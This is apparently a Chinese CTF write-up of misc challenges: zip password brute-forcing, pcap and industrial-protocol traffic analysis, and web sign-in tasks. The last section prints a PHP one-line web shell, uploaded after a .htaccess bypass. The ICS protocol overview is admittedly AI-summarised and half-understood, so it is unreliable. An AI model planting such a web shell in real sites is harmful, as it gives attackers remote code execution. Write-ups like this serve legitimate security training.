Misc
谍影重重plus(misc)
随波逐流修复伪加密
零宽字符解密,???需要爆破
import itertools
import stringdef generate_symmetric_passwords():# 扩展字符集:大小写字母 + 数字 + 符号chars = string.ascii_letters + string.digits + string.punctuationwith open('passwords.txt', 'w', encoding='utf-8') as file:for prefix in itertools.product(chars, repeat=3):prefix_str = ''.join(prefix)symmetric_part = prefix_str + prefix_str[::-1]password = f"Yunxi{symmetric_part}ixnuY"file.write(password + '\n')if __name__ == "__main__":generate_symmetric_passwords()print("密码字典已生成到 passwords.txt 文件")
生成字典爆破得到密码
解压后得到一张图片,猜测图片隐写
存在但是随波逐流梭哈不出来
需要密码,把yunxi.zip放到010里面拖到尾巴看到密码
直接cat文件得到flag Yunxi{Wl11l_5_120o0o0O3}
FZ(misc)
放到鲨鱼里打开,看到关键字,流量分析
放到随波逐流里显示文件包含,直接文件提取
得到压缩包需要密码解压缩,流量分析那里给了密码
直接得到flag了、
GK(misc)
题目说了分析目标流量中的工控流量(在工业控制系统中传输的通信数据),并从流量中识别其中的flag,看协议分级发现IEC
这里总结一下常见的工控协议目的是眼熟罢了,至于大多数的ctf题型都是ai总结的我也不太懂看了个大概,这边感兴趣可以自己详细了解,今天我只了解下IEC
Modbus (TCP/RTU)
PLC(可编程逻辑控制器)通信,用于读取/写入寄存器
- CTF常见题型:
- 数据窃取:从Modbus寄存器中提取flag(如
holding_register
中的ASCII值)。 - 恶意控制:伪造
Write Single Register
(功能码06)篡改设备状态。 - 异常检测:识别异常的
Function Code
(如非法的05-强制单线圈)。
其实后面两个都不太懂嘻嘻,反正先总结到一起见到题目再说
DNP3 (Distributed Network Protocol)
电力系统远程监控(如智能电网)
- CTF常见题型:
-
- 解密会话:提取DNP3的
Auth Session Key
(搜了一下,在鲨鱼里
- 解密会话:提取DNP3的
dnp3 && tcp.port == 20000(过滤 DNP3 报文)
dnp3.al.function_code == 0x81(查找 Session Key Response
)
-
- 数据篡改:伪造
Control Relay Output Block
(CROB)触发设备动作。 - 异常流量分析:检测恶意
Unsolicited Response
(突发响应)。
- 数据篡改:伪造
IEC 60870-5-101/104
电力自动化(如变电站监控 )
- CTF常见题型:
- ASDU解析:从
M_ME_NC_1
(浮点遥测)中提取隐藏数据。 - 恶意指令:伪造
C_SC_NA_1
(单点遥控)模拟攻击。 - 时间戳分析:从
CP56Time2a
字段中解码时间信息。
S7Comm (Siemens S7 PLC)
西门子PLC通信
- CTF常见题型:
- 数据块读取:从
DB1.DBW0
中提取flag。 - 漏洞利用:利用S7Comm的
CPU Start/Stop
功能攻击PLC。 - 协议逆向:分析自定义功能码(如
0x1C
)。
搜过滤器,我那个有带你麻烦,直接看张大美人的过滤 iec60870_asdu
看到{,按照时间顺序排列
手打解码得到flag
ez签到 1.0版(misc)
查看源码
get传参得到
要求传YX参数而且参数长度小于8传个ls
看到一个压缩包去下载,直接get访问压缩包就下载了
得到
两张图片分为步骤一二,提示说像素圣战了,来参考看到题目,需要密码解二进制,正好两张图片分两步,第一个试了好多图片隐写都不是,提取盲水印
用在线工具得到flag
ez签到 2.0版(misc)
看着是文件上传,但是试了几个都不行,上传.htaccess文件再上传一句话木马,但是过滤php标签,就换成html标签
<script language="php">
@eval($_POST['shell']);
</script>
en....先pass后面不知道为什莫蚁剑连接不上